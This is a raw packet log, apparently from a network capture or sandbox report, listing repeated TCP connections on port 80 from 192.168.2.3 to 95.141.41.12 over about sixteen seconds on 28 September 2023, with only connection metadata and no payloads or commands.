                                                                                              Sep 28, 2023 06:02:56.269181967 CEST5000280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:56.269635916 CEST5000380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:56.464369059 CEST805000295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:56.464437962 CEST5000280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:56.475336075 CEST805000395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:56.475411892 CEST5000380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:56.475678921 CEST5000380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:56.681355953 CEST805000395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:56.685781956 CEST805000395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:56.685857058 CEST5000380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:56.918859005 CEST5000380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:56.919342995 CEST5000580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.109689951 CEST805000595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:57.110030890 CEST5000580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.110030890 CEST5000580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.124675035 CEST805000395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:57.124911070 CEST5000380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.300416946 CEST805000595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:57.305238962 CEST805000595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:57.305773973 CEST5000580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.419193029 CEST5000580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.419464111 CEST5000680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.607686996 CEST805000695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:57.608170033 CEST5000680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.608483076 CEST5000680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.610037088 CEST805000595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:57.610352993 CEST5000580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.796596050 CEST805000695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:57.803512096 CEST805000695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:57.803747892 CEST5000680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.921430111 CEST5000680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:57.921608925 CEST5000880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.109837055 CEST805000695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:58.109904051 CEST805000895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:58.109925032 CEST5000680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.110006094 CEST5000880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.110224962 CEST5000880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.298088074 CEST805000895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:58.302835941 CEST805000895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:58.303083897 CEST5000880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.419239044 CEST5000980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.419363976 CEST5000880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.607101917 CEST805000895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:58.607358932 CEST5000880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.624988079 CEST805000995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:58.625092030 CEST5000980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.625406981 CEST5000980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.830904961 CEST805000995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:58.835597038 CEST805000995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:58.835745096 CEST5000980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.950151920 CEST5000980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:58.950800896 CEST5001080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.144714117 CEST805001095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:59.144841909 CEST5001080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.145059109 CEST5001080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.155699015 CEST805000995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:59.155797005 CEST5000980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.339551926 CEST805001095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:59.344568968 CEST805001095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:59.344769001 CEST5001080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.450253010 CEST5001080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.450606108 CEST5001280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.644581079 CEST805001095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:59.644963980 CEST5001080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.654994965 CEST805001295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:59.655360937 CEST5001280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.655646086 CEST5001280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.860889912 CEST805001295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:59.865083933 CEST805001295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:59.865225077 CEST5001280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.982506990 CEST5001280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:59.983081102 CEST5001380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.179421902 CEST805001395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:00.179750919 CEST5001380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.179828882 CEST5001380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.187294006 CEST805001295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:00.187383890 CEST5001280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.376349926 CEST805001395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:00.381367922 CEST805001395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:00.381576061 CEST5001380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.497154951 CEST5001380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.497476101 CEST5001480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.693983078 CEST805001395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:00.694336891 CEST5001380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.694863081 CEST805001495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:00.694952965 CEST5001480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.695137978 CEST5001480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:00.892807007 CEST805001495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:00.896809101 CEST805001495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:00.896912098 CEST5001480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.012693882 CEST5001480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.012888908 CEST5001680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.197588921 CEST805001695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:01.197724104 CEST5001680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.197971106 CEST5001680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.210365057 CEST805001495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:01.210513115 CEST5001480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.383704901 CEST805001695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:01.385119915 CEST805001695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:01.385185003 CEST5001680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.499937057 CEST5001680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.500353098 CEST5001780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.684720993 CEST805001695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:01.684895992 CEST5001680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.704859018 CEST805001795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:01.704982996 CEST5001780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.705183983 CEST5001780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:01.909471035 CEST805001795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:01.912450075 CEST805001795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:01.912525892 CEST5001780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.028099060 CEST5001780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.028579950 CEST5001880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.216319084 CEST805001895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:02.216450930 CEST5001880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.216645956 CEST5001880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.232355118 CEST805001795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:02.232510090 CEST5001780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.404067039 CEST805001895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:02.407897949 CEST805001895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:02.407979965 CEST5001880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.513015032 CEST5001880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.513353109 CEST5002080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.700632095 CEST805001895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:02.700747013 CEST5001880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.718100071 CEST805002095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:02.718172073 CEST5002080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.718378067 CEST5002080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:02.924057007 CEST805002095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:02.927342892 CEST805002095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:02.927412987 CEST5002080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.029860020 CEST5002080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.030249119 CEST5002180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.224160910 CEST805002195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:03.224379063 CEST5002180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.224649906 CEST5002180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.234927893 CEST805002095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:03.235009909 CEST5002080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.418229103 CEST805002195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:03.422745943 CEST805002195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:03.422806025 CEST5002180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.528667927 CEST5002180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.529071093 CEST5002280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.723094940 CEST805002195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:03.723223925 CEST5002180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.728322029 CEST805002295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:03.728514910 CEST5002280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.728667021 CEST5002280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:03.928011894 CEST805002295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:03.930944920 CEST805002295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:03.931039095 CEST5002280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.043754101 CEST5002280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.044205904 CEST5002480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.229561090 CEST805002495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:04.229855061 CEST5002480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.229969978 CEST5002480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.243555069 CEST805002295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:04.243618965 CEST5002280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.415122032 CEST805002495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:04.419014931 CEST805002495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:04.419162035 CEST5002480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.528331041 CEST5002480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.528743982 CEST5002580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.713052988 CEST805002495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:04.713264942 CEST5002480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.715809107 CEST805002595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:04.715926886 CEST5002580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.716134071 CEST5002580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:04.903464079 CEST805002595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:04.908276081 CEST805002595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:04.908473969 CEST5002580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.028899908 CEST5002580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.029277086 CEST5002680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.217207909 CEST805002595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:05.217349052 CEST5002580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.227844000 CEST805002695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:05.228171110 CEST5002680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.228338957 CEST5002680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.426418066 CEST805002695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:05.430648088 CEST805002695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:05.430732012 CEST5002680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.543750048 CEST5002680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.544173002 CEST5002880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.732201099 CEST805002895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:05.732476950 CEST5002880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.732593060 CEST5002880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.741950035 CEST805002695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:05.742167950 CEST5002680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:05.920322895 CEST805002895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:05.924587965 CEST805002895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:05.924664974 CEST5002880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.028115034 CEST5002880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.028527021 CEST5002980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.212625027 CEST805002995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:06.212737083 CEST5002980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.212996960 CEST5002980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.215678930 CEST805002895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:06.215872049 CEST5002880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.397089958 CEST805002995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:06.401823044 CEST805002995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:06.401899099 CEST5002980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.513814926 CEST5002980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.514079094 CEST5003180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.697907925 CEST805002995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:06.698072910 CEST805003195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:06.698081970 CEST5002980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.698220968 CEST5003180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.698995113 CEST5003180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.882733107 CEST805003195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:06.887833118 CEST805003195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:06.887923002 CEST5003180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.996849060 CEST5003180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:06.997301102 CEST5003380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.181144953 CEST805003195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:07.181382895 CEST5003180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.183860064 CEST805003395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:07.184062958 CEST5003380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.184398890 CEST5003380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.371047020 CEST805003395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:07.375551939 CEST805003395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:07.375674009 CEST5003380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.481650114 CEST5003380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.483191967 CEST5003480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.668565989 CEST805003395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:07.668776035 CEST5003380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.673661947 CEST805003495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:07.673752069 CEST5003480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.674040079 CEST5003480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.864697933 CEST805003495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:07.869729042 CEST805003495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:07.869976044 CEST5003480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.981121063 CEST5003480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:07.981439114 CEST5003580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.165328026 CEST805003595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:08.165591002 CEST5003580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.165680885 CEST5003580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.171720028 CEST805003495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:08.171809912 CEST5003480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.349806070 CEST805003595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:08.354300976 CEST805003595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:08.354563951 CEST5003580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.467233896 CEST5003580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.467529058 CEST5003680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.651967049 CEST805003595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:08.652122974 CEST805003695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:08.652261019 CEST5003680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.652345896 CEST5003580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.652456999 CEST5003680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.837749958 CEST805003695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:08.842300892 CEST805003695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:08.842400074 CEST5003680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.950124025 CEST5003680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:08.950397968 CEST5003780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.135057926 CEST805003695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:09.135241032 CEST5003680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.137384892 CEST805003795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:09.137490034 CEST5003780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.137732983 CEST5003780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.324624062 CEST805003795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:09.328531981 CEST805003795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:09.328856945 CEST5003780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.434539080 CEST5003780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.435616970 CEST5003880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.622809887 CEST805003795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:09.622999907 CEST5003780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.635207891 CEST805003895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:09.635478973 CEST5003880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.635478973 CEST5003880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.835449934 CEST805003895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:09.840040922 CEST805003895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:09.840163946 CEST5003880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.949963093 CEST5003880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:09.950902939 CEST5003980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.134866953 CEST805003995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:10.135023117 CEST5003980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.135186911 CEST5003980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.150073051 CEST805003895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:10.150158882 CEST5003880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.319060087 CEST805003995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:10.324111938 CEST805003995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:10.324203014 CEST5003980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.436077118 CEST5003980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.436489105 CEST5004180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.620239019 CEST805003995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:10.620487928 CEST5003980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.636137009 CEST805004195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:10.636323929 CEST5004180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.636466980 CEST5004180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.835969925 CEST805004195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:10.838809013 CEST805004195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:10.839039087 CEST5004180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.950623989 CEST5004180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:10.952102900 CEST5004280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.147258043 CEST805004295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:11.147330999 CEST5004280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.147564888 CEST5004280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.150310040 CEST805004195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:11.150388956 CEST5004180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.341710091 CEST805004295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:11.346677065 CEST805004295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:11.346735001 CEST5004280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.450195074 CEST5004280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.450711012 CEST5004380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.645858049 CEST805004295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:11.645952940 CEST5004280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.654936075 CEST805004395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:11.655133009 CEST5004380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.655272961 CEST5004380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.860061884 CEST805004395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:11.864571095 CEST805004395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:11.864756107 CEST5004380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.968611002 CEST5004380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:11.969178915 CEST5004580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:12.165448904 CEST805004595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:12.165581942 CEST5004580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:12.165865898 CEST5004580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:12.174154997 CEST805004395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:12.174333096 CEST5004380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:12.362132072 CEST805004595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:12.368468046 CEST805004595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:12.368643045 CEST5004580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:12.481286049 CEST5004580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:12.481692076 CEST5004680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:12.677988052 CEST805004595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:12.678203106 CEST5004580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:03:12.687882900 CEST805004695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:03:12.688303947 CEST5004680192.168.2.395.141.41.12
